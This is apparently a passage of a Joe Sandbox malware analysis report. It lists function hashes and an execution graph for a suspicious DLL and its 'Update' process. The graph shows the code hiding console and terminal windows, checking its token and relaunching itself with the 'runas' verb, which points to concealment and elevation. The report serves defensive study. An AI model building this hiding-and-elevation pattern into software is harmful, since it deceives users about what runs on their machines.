                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54de954a37c6b7de1844cf5c6ed920bf0a56668b13510849e3f6c425486d18a5
                                                    • Instruction ID: 585242ee5626ab8ab59c7a5011b2df3bd5208ed75daa64b270322b07255950ba
                                                    • Opcode Fuzzy Hash: 54de954a37c6b7de1844cf5c6ed920bf0a56668b13510849e3f6c425486d18a5
                                                    • Instruction Fuzzy Hash: 91D01221F2D9265BE7A8777C28421F52281EB486D4F4441B2E50DC51C9ED0C6C9112D8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F35149 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8870868b68c26ce01d48fab20210eec9a980e8642f947e770a6f99c65f83b40a
                                                    • Instruction ID: 12e88f42e6a4e4d10b2ee19fe315d30e513b8422cf05a73e7ba8449b466cbf2e
                                                    • Opcode Fuzzy Hash: 8870868b68c26ce01d48fab20210eec9a980e8642f947e770a6f99c65f83b40a
                                                    • Instruction Fuzzy Hash: B2E01221D1EA8B4EE645773C09651695584AFA96C0F5904B7D808CB0D3FE4C98484259
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F466ED Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b025cf910ae96c320f88f7d8e3c977dc3fcd336ba153524e0acff13f552a5086
                                                    • Instruction ID: 1ab81ed8bf901129d7887399a0d23d3937df72b73605faa4177e76861ce731a1
                                                    • Opcode Fuzzy Hash: b025cf910ae96c320f88f7d8e3c977dc3fcd336ba153524e0acff13f552a5086
                                                    • Instruction Fuzzy Hash: DED05E21F4981D0EEB44B3B428165FDB29AEF88644FD00077E51ED31C7CE2D2A110696
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F381C0 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 621831b968a0e9b7f41b8ae7df3c8ebed4bbf1dc06195dd3fa22778a31d9dadd
                                                    • Instruction ID: b12b755d78cfc2d7fb3599d24c45f663b30851ee062ce7df2a3d2b07e5642aa2
                                                    • Opcode Fuzzy Hash: 621831b968a0e9b7f41b8ae7df3c8ebed4bbf1dc06195dd3fa22778a31d9dadd
                                                    • Instruction Fuzzy Hash: 39C0123346CA4D4BC705B754E4514EEF350FF90750F400B3AE04B810A5EED8664886C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3F62F Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3268dbf928923622b715f9fe1023b7ef2a5b28b1dd118291888fd46efa2691c8
                                                    • Instruction ID: 831c49f4977cbcce173cb2eb2944dc8fb5bf134083c4a7016c1fed56048dec5b
                                                    • Opcode Fuzzy Hash: 3268dbf928923622b715f9fe1023b7ef2a5b28b1dd118291888fd46efa2691c8
                                                    • Instruction Fuzzy Hash: 05C0123295CA4D5AC642B714E4518DEB750EF906A0FC01B3AF04B810A9ED5866898681
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F45EC5 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2311f8910253a16482cee28649b7aa02f8a4b66960ebf9f296535228fe119a65
                                                    • Instruction ID: fe7e4140cd0ea5e7271f67bce13075c89423fc1827413c941f9bc08745c25b6e
                                                    • Opcode Fuzzy Hash: 2311f8910253a16482cee28649b7aa02f8a4b66960ebf9f296535228fe119a65
                                                    • Instruction Fuzzy Hash: 8CC09B3394D1258CF71575487D034FCF350E751575F101137D34E918C26B17342A05CA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3FC09 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f7ad00fb288320564612e84b6d74ecee9fd824db661d88bac55699b876cffcfe
                                                    • Instruction ID: 307c5083d6e3f6f7127082a277a272f52f9a97c5801f68ea07b910f59af600fd
                                                    • Opcode Fuzzy Hash: f7ad00fb288320564612e84b6d74ecee9fd824db661d88bac55699b876cffcfe
                                                    • Instruction Fuzzy Hash: 19C012715146444BD704AA0484464E637D1FB94241F800A6AEC89CA261DA2C96455691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F43A96 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1aedbe052c9d6cf53f699721dfcacbd654fa19eaad3d4048f54fd5ddf328100f
                                                    • Instruction ID: c1cf99450a75b3a4cbc5f2e42b3f882467708fbda21cbfe82f99e71c6767fa05
                                                    • Opcode Fuzzy Hash: 1aedbe052c9d6cf53f699721dfcacbd654fa19eaad3d4048f54fd5ddf328100f
                                                    • Instruction Fuzzy Hash: 4BA0120AE5A01500B100605878410E4E301CBC0071A554F32D8044004D989E01821040
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3E2F0 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 480a9b6898aacff37e81015e2ae725d2d053bc2880f3d93e04a45d65bbb253dd
                                                    • Instruction ID: cec02b94384afb88737523f71378fc179d7ba9435e852eb3f7805f17b07137ec
                                                    • Opcode Fuzzy Hash: 480a9b6898aacff37e81015e2ae725d2d053bc2880f3d93e04a45d65bbb253dd
                                                    • Instruction Fuzzy Hash: 0EC09B0251F19570E741397D70011DF1BB4BA4237DF0C527FD0C98C4434D0C5085535C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3D9EC Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                                    • Instruction ID: 3440027b30c89a26ab55cd4b8832df96ce07e3425dbca01cb75e0d56f1f11528
                                                    • Opcode Fuzzy Hash: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                                    • Instruction Fuzzy Hash: D0B0923295844E9EDF0077B424120E93240AB44240F401932A80DC20C6EE2965240944
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F48514 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a96ec37730c2a43765fba6dc40b98debdd5ca7cd73c07f97783db786eda63acb
                                                    • Instruction ID: 85cc8da7090d32d1b6cd5149c1608b094553127eefceb1482c043eb0b87d8d3f
                                                    • Opcode Fuzzy Hash: a96ec37730c2a43765fba6dc40b98debdd5ca7cd73c07f97783db786eda63acb
                                                    • Instruction Fuzzy Hash: 82B0123380D0284CAF1421043C010E8B390E709130F621113C202310409706242510C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3C237 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfb1c0e86728c6e3ab9a0c41101981710a80ca15a5a879adac0eef52abd0bcfa
                                                    • Instruction ID: 925a2acf55332a81ba4a1e1a84e183d185aa50909487e8d4ba00d16e9b4f41ee
                                                    • Opcode Fuzzy Hash: bfb1c0e86728c6e3ab9a0c41101981710a80ca15a5a879adac0eef52abd0bcfa
                                                    • Instruction Fuzzy Hash: 93A01233A48019458F10518474000FDB310D7841A5F000033D21E82040971114340180
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00007FF848F321C9 Relevance: 11.4, Strings: 9, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
                                                    • API String ID: 0-3520357160
                                                    • Opcode ID: f80de5340cb7c7e65d0cf9ee4a99601fae9b38787c90367e327d10d9e697b479
                                                    • Instruction ID: a6e5fa457830296cb9c4085719ca1e5dc4cd50a0a7d4dd08d008a75c379fa635
                                                    • Opcode Fuzzy Hash: f80de5340cb7c7e65d0cf9ee4a99601fae9b38787c90367e327d10d9e697b479
                                                    • Instruction Fuzzy Hash: 3441A273E1D98A8FF299A66C585637963C2FBA8AD1F4540BAC40ED72C6DE2C9C030354
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F5179E Relevance: 9.0, Strings: 7, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH$HAH$HAH$HAH$HAH$hkI$hkI
                                                    • API String ID: 0-2947734058
                                                    • Opcode ID: 51678dd5bf930affc10ab365ad0727d6fc0c80c1e9bf49950543618dd4f2a933
                                                    • Instruction ID: ec2673639707b9ec4b4156b9b601dde8c3d4802bb2253b9d9da0ec2ca97d327e
                                                    • Opcode Fuzzy Hash: 51678dd5bf930affc10ab365ad0727d6fc0c80c1e9bf49950543618dd4f2a933
                                                    • Instruction Fuzzy Hash: 95510432F2DD8A4FE3A9A72C546227967D2EF98A84B5501B9C04EC32C7DE187C474345
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F32A50 Relevance: 7.8, Strings: 6, Instructions: 252COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH$HAH$HAH$HAH$HAH$wS_H
                                                    • API String ID: 0-3625145561
                                                    • Opcode ID: 649cab4ac2e0e841b3dbc20a23fea9c1efe7b007d03d3ff462b1a23546823310
                                                    • Instruction ID: 91333b8b609a19192c6a286da737217b2594dd25933824cec1633d72bead44b7
                                                    • Opcode Fuzzy Hash: 649cab4ac2e0e841b3dbc20a23fea9c1efe7b007d03d3ff462b1a23546823310
                                                    • Instruction Fuzzy Hash: EC613332E1C94A5FE268A77C68552BA67D1FB856A2F14427BC44EC32C6EE3C68034395
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F510B0 Relevance: 7.7, Strings: 6, Instructions: 214COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH$HAH$HAH$hkI$hkI$hkI
                                                    • API String ID: 0-4089910148
                                                    • Opcode ID: 51aa61227c5af9ce027e4f1900d41cab2631062ad7eb6714f1caff20bcd2bdec
                                                    • Instruction ID: 54a040eed44dbad8511441d315d2c64a2a64fee877136f84f5a91c41617a2789
                                                    • Opcode Fuzzy Hash: 51aa61227c5af9ce027e4f1900d41cab2631062ad7eb6714f1caff20bcd2bdec
                                                    • Instruction Fuzzy Hash: C1513D32E0D98E4FE755E76898652BA7BE2EF95350F0402BAC00DC72D7DE286C068395
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F304CF Relevance: 6.5, Strings: 5, Instructions: 288COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^N$M_^P$M_^f$M_^t$M_^v
                                                    • API String ID: 0-3677958243
                                                    • Opcode ID: 54bf79eca11c34a60e96376837a873a732263574b28baaee6fb5e501a4ba7869
                                                    • Instruction ID: 1929a3d51b338a7804d74fc82e78b16024177d30cd054625a0a672ac19412a7b
                                                    • Opcode Fuzzy Hash: 54bf79eca11c34a60e96376837a873a732263574b28baaee6fb5e501a4ba7869
                                                    • Instruction Fuzzy Hash: 6D81A317A1F15AA9E25177BC74550FA6B60EF823BDF1847B7D1CC8D0C39E0D208646AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F34E15 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: eH$XfH$xmH$]H
                                                    • API String ID: 0-3741607822
                                                    • Opcode ID: d327bcafb7ddb4dbccd1c3fbf5c76d31e8e3440416292b4423e3f84695f37d64
                                                    • Instruction ID: a4c95b96d22b4350329a2916d0260bf6085ec9aed3f7f1c471bc578e30faf6c4
                                                    • Opcode Fuzzy Hash: d327bcafb7ddb4dbccd1c3fbf5c76d31e8e3440416292b4423e3f84695f37d64
                                                    • Instruction Fuzzy Hash: 6CA14672E1D98A8FE785E77C98152B97BE1EFA5250F0841BBC00DC71D7DE28A8858384
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:0.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:16.1%
                                                    Total number of Nodes:124
                                                    Total number of Limit Nodes:9
                                                    execution_graph 35821 6cf77ccc 35822 6cf77cd5 35821->35822 35823 6cf77cda 35821->35823 35842 6cf78722 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 35822->35842 35827 6cf77b96 35823->35827 35828 6cf77ba2 ___scrt_is_nonwritable_in_current_image 35827->35828 35829 6cf77bcb dllmain_raw 35828->35829 35830 6cf77bb1 35828->35830 35831 6cf77bc6 35828->35831 35829->35830 35832 6cf77be5 dllmain_crt_dispatch 35829->35832 35843 6cf54dd0 35831->35843 35832->35830 35832->35831 35835 6cf77c40 dllmain_crt_dispatch 35835->35830 35837 6cf77c53 dllmain_raw 35835->35837 35836 6cf77c37 35836->35830 35836->35835 35837->35830 35838 6cf54dd0 __DllMainCRTStartup@12 147 API calls 35839 6cf77c1e 35838->35839 35846 6cf77ae6 167 API calls 4 library calls 35839->35846 35841 6cf77c2c dllmain_raw 35841->35836 35842->35823 35844 6cf54dee 35843->35844 35845 6cf54dd9 CreateThread 35843->35845 35844->35836 35844->35838 35845->35844 35847 6cf54bd0 EnumWindows GetConsoleWindow ShowWindow GetCurrentProcess OpenProcessToken 35845->35847 35846->35841 35848 6cf54c31 GetTokenInformation 35847->35848 35849 6cf54c53 35847->35849 35922 6cf54b70 GetClassNameW lstrcmpW 35847->35922 35848->35849 35850 6cf54c61 35849->35850 35851 6cf54c5a FindCloseChangeNotification 35849->35851 35852 6cf54c65 35850->35852 35853 6cf54c6f 35850->35853 35851->35850 35906 6cf54590 130 API calls 3 library calls 35852->35906 35868 6cf58ac0 35853->35868 35855 6cf54c6a 35865 6cf54d2e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35855->35865 35860 6cf54d50 35861 6cf54cb6 35888 6cf54a50 ShellExecuteExW 35861->35888 35863 6cf54d56 35908 6cf831ca 35863->35908 35864 6cf54cbb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35864->35863 35864->35865 35907 6cf775e6 5 API calls ___raise_securityfailure 35865->35907 35869 6cf58b10 35868->35869 35872 6cf58b1d 35868->35872 35913 6cf59790 26 API calls 4 library calls 35869->35913 35871 6cf54ca4 35874 6cf568d0 35871->35874 35872->35871 35914 6cf598d0 26 API calls 4 library calls 35872->35914 35875 6cf568fb 35874->35875 35876 6cf56902 35875->35876 35877 6cf56999 35875->35877 35879 6cf5695d 35875->35879 35880 6cf5693e 35875->35880 35876->35861 35917 6cf51450 26 API calls 2 library calls 35877->35917 35887 6cf56952 _Yarn 35879->35887 35916 6cf51450 26 API calls 3 library calls 35879->35916 35880->35877 35882 6cf56945 35880->35882 35881 6cf5694b 35883 6cf831ca 25 API calls 35881->35883 35881->35887 35915 6cf51450 26 API calls 3 library calls 35882->35915 35886 6cf569a3 35883->35886 35887->35861 35889 6cf54ae5 WaitForSingleObject CloseHandle 35888->35889 35890 6cf54afb 35888->35890 35891 6cf54b0e 35889->35891 35892 6cf568d0 26 API calls 35890->35892 35894 6cf54b3d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35891->35894 35898 6cf54b60 35891->35898 35893 6cf54b09 35892->35893 35896 6cf54a50 26 API calls 35893->35896 35918 6cf775e6 5 API calls ___raise_securityfailure 35894->35918 35896->35891 35897 6cf54b5c 35897->35864 35899 6cf831ca 25 API calls 35898->35899 35900 6cf54b65 GetClassNameW lstrcmpW 35899->35900 35902 6cf54bb5 35900->35902 35903 6cf54bad ShowWindow 35900->35903 35919 6cf775e6 5 API calls ___raise_securityfailure 35902->35919 35903->35902 35905 6cf54bc5 35905->35864 35906->35855 35907->35860 35920 6cf83156 25 API calls 3 library calls 35908->35920 35910 6cf831d9 35921 6cf831e7 11 API calls std::locale::_Setgloballocale 35910->35921 35912 6cf831e6 35913->35872 35914->35872 35915->35881 35916->35887 35917->35881 35918->35897 35919->35905 35920->35910 35921->35912 35923 6cf54bb5 35922->35923 35924 6cf54bad ShowWindow 35922->35924 35927 6cf775e6 5 API calls ___raise_securityfailure 35923->35927 35924->35923 35926 6cf54bc5 35927->35926 35928 6cf7798c 35929 6cf77997 35928->35929 35930 6cf779ca 35928->35930 35932 6cf779bc 35929->35932 35933 6cf7799c 35929->35933 35956 6cf77ae6 167 API calls 4 library calls 35930->35956 35940 6cf779df 35932->35940 35935 6cf779b2 35933->35935 35936 6cf779a1 35933->35936 35955 6cf77721 23 API calls 35935->35955 35939 6cf779a6 35936->35939 35954 6cf77740 21 API calls 35936->35954 35941 6cf779eb ___scrt_is_nonwritable_in_current_image 35940->35941 35957 6cf777b1 35941->35957 35943 6cf779f2 __DllMainCRTStartup@12 35944 6cf77ade 35943->35944 35945 6cf77a19 35943->35945 35951 6cf77a55 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 35943->35951 35971 6cf7855e 4 API calls 2 library calls 35944->35971 35968 6cf77713 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 35945->35968 35948 6cf77ae5 35949 6cf77a28 __RTC_Initialize 35949->35951 35969 6cf77655 InitializeSListHead 35949->35969 35951->35939 35952 6cf77a36 35952->35951 35970 6cf776e8 IsProcessorFeaturePresent ___scrt_release_startup_lock 35952->35970 35954->35939 35955->35939 35956->35939 35958 6cf777ba 35957->35958 35972 6cf77ef8 IsProcessorFeaturePresent 35958->35972 35960 6cf777c6 35973 6cf7b3ec 10 API calls 2 library calls 35960->35973 35962 6cf777cb 35967 6cf777cf 35962->35967 35974 6cf89b98 35962->35974 35965 6cf777e6 35965->35943 35967->35943 35968->35949 35969->35952 35970->35951 35971->35948 35972->35960 35973->35962 35978 6cf94969 35974->35978 35977 6cf7b421 7 API calls 2 library calls 35977->35967 35979 6cf94979 35978->35979 35980 6cf777d8 35978->35980 35979->35980 35982 6cf8b521 35979->35982 35980->35965 35980->35977 35983 6cf8b528 35982->35983 35984 6cf8b56b GetStdHandle 35983->35984 35985 6cf8b5d1 35983->35985 35986 6cf8b57e GetFileType 35983->35986 35984->35983 35985->35979 35986->35983

                                                    Executed Functions

                                                    Function 6CF54A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 117stringsynchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • ShellExecuteExW.SHELL32 ref: 6CF54ADB
                                                    • WaitForSingleObject.KERNEL32(6CF9C8CD,000000FF), ref: 6CF54AEA
                                                    • CloseHandle.KERNEL32(6CF9C8CD), ref: 6CF54AF3
                                                    • GetClassNameW.USER32(?,?,00000064), ref: 6CF54B91
                                                    • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6CF54BA3
                                                    • ShowWindow.USER32(?,00000000), ref: 6CF54BAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ClassCloseExecuteHandleNameObjectShellShowSingleWaitWindowlstrcmp
                                                    • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                                    • API String ID: 1631206612-3791737310
                                                    • Opcode ID: e1ad600c9dd8febe2f8244d975f6c12549a2154248111077d7175cdb9339a51e
                                                    • Instruction ID: ea0eb1bef703338b92ee92d5349b8cd0b7e36032431211d7c03f178fcea6fb27
                                                    • Opcode Fuzzy Hash: e1ad600c9dd8febe2f8244d975f6c12549a2154248111077d7175cdb9339a51e
                                                    • Instruction Fuzzy Hash: 12416071E10208ABDF44DFA4C945BEEBBB8FF09314F50425AF911A7680DB749A58CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF77AE6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • __RTC_Initialize.LIBCMT ref: 6CF77B2D
                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6CF77B47
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                    • String ID:
                                                    • API String ID: 2442719207-0
                                                    • Opcode ID: 36e49c7ccd137609d1f6859b0bcdcaa6d92f9cbda9c4f1c2456c340cf55913a5
                                                    • Instruction ID: c77c06a5f9dc13624b7c14feb676ec8e646825fd2649dd69f8849e18e96c8d84
                                                    • Opcode Fuzzy Hash: 36e49c7ccd137609d1f6859b0bcdcaa6d92f9cbda9c4f1c2456c340cf55913a5
                                                    • Instruction Fuzzy Hash: CF412332E21214ABDB328F69EC40BAF7AB4EB85768F11452BE810A7B50C7304D158BF0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF54BD0 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
